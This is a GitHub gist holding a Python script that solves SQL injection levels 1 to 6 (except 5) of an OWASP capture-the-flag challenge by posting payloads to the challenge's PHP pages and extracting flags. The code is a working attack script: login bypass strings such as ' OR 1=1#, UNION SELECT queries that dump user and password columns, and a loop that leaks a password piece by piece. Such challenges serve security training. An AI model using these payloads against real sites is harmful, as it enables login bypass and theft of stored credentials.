Skip to content

Instantly share code, notes, and snippets.

@abdilahrf

abdilahrf/sqli-mezzanie-owaspctf.py

Created September 23, 2017 13:22
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save abdilahrf/2665942b3b88d390977c1849ec04f734 to your computer and use it in GitHub Desktop.
Save abdilahrf/2665942b3b88d390977c1849ec04f734 to your computer and use it in GitHub Desktop.
Download ZIP
Solution for sqli level 1-6 except 5
Raw
sqli-mezzanie-owaspctf.py
import requests
import re
#GLOBAL
base_url = "http://mezzanine.mysterious-hashes.net/"
format_flag = "flag{%s}"
#LEVEL 1
payload = {
"user": "' OR 1=1#",
"pass": "' OR 1=1#"
}
result = requests.post(base_url+"db01.php",data=payload).text
flag = re.search("flag{(.*)}",result).group(1)
print "Level1 : " + format_flag % flag
#LEVEL 2
payload = {
"user": "' OR 1=1 limit 1#",
"pass": "' OR 1=1 limit 1#"
}
result = requests.post(base_url+"db02.php",data=payload).text
flag = re.search("flag{(.*)}",result).group(1)
print "Level2 : " + format_flag % flag
#LEVEL 3
payload = {
"user": "' UNION SELECT group_concat(user) from user#"
}
result = requests.post(base_url+"db03.php",data=payload).text
flag = re.search("user '(.*)'",result).group(1).split(",")[1]
print "Level3 : " + format_flag % flag
#LEVEL 4
payload = {
"user": "' UNION SELECT group_concat(user,0x3a,pass) from user#"
}
result = requests.post(base_url+"db04.php",data=payload).text
flag = re.search("user '(.*)'",result).group(1).split(",")[0].split(":")[1]
print "Level4 : " + format_flag % flag
#LEVEL 5
print "Level5 : -"
#LEVEL 6
flag = ""
for x in xrange(1, 64, 8):
payload = {
"code": "foobar' UNION SELECT mid(pass,%d) from user#" % x
}
result = requests.post(base_url+"db06.php",data=payload).text
flag += re.search("<li>(.*)</li>", result).groups()[0]
print "Level6 : " + format_flag % flag
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment